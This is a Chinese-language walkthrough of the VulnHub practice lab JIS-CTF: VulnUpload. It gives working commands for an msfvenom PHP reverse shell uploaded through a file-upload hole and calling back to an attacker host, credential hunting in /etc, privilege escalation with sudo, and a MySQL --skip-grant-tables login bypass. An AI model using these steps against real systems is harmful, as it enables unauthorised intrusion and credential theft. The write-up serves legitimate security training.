JIS-CTF解题思路及关键语句

JIS-CTF题目描述

• 靶场题目：JIS-CTF: VulnUpload
• 靶场地址：JIS-CTF: VulnUpload ~ VulnHub
• 难度描述：包含5个Flag，初级难度，查找所有Flag平均需要1.5小时
• 靶场作者：Mohammad Khreesha
• 靶场描述：Description: There are five flags on this machine. Try to find them. It takes 1.5 hour on average to find all flags.

---

浏览网站

dirb 扫描网站敏感目录，发现robot.txt

要浏览所有敏感页面可以发现flag

http://10.10.10.148/flag/     The 1st flag is : {8734509128730458630012095}

浏览页面源码可以看到页面登录密码和flag2

登入界面，发现可以上传文件功能，

思路：

在msf中，

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 10.10.10.147

set lport 4444

exploit

在命令行：

msfvenom  -p php/meterpreter/reverse_tcp LHOST=10.10.10.147 LPORT=4444 -f raw > shell.php

利用msfvenom制作的shell.php，上传到网站上，浏览执行

http://10.10.10.148/uploaded_files/shell.php

成功反射，进入meterpreter

shell

python3 -c "import pty;pty.spawn('/bin/bash')"

进入/var/www/html目录

cat /etc/passwd

发现有个technawi用户

查看hint.txt       3flag

接下来是重点：找与用户technawi有关的文件

因为hint.txt提示：technawi的密码在一个隐藏文件中

找与用户相关的文件的命令为：

find / -user ‘technawi’ 2>/dev/null

find / -user ‘technawi’ 2>/dev/null

find / -user ‘technawi’ 2>/dev/null

重要的说三遍

另外一种方法：进入/etc/目录，输入

grep -rns 用户名

也可以找到 /etc/mysql/conf.d/credentials.txt 

cat /etc/mysql/conf.d/credentials.txt  看到4flag和密码

The 4th flag is : {7845658974123568974185412}

username : technawi
password : 3vilH@ksor

切换到用户technawi，可以查看/var/www/html/flag.txt文件，找到flag5

补充说明：切换用户必须在终端下进行，因此也可以使用ssh命令连接靶机。

使用sudo -l看看sudo权限

root权限可以直接使用sudo su -获得

最后：获取数据库数据

同样数据库操作也非常有意思，我们尝试获取mysql数据库内容。

核心步骤为：登录root权限，新建目录并使用命令跳过输入密码过程

• mkdir -p /var/run/mysqld
• chown -R mysql:mysql /var/run/mysqld
• mysqld_safe --skip-grant-tables &

接着新开一个终端mysql -u root无密码登陆即可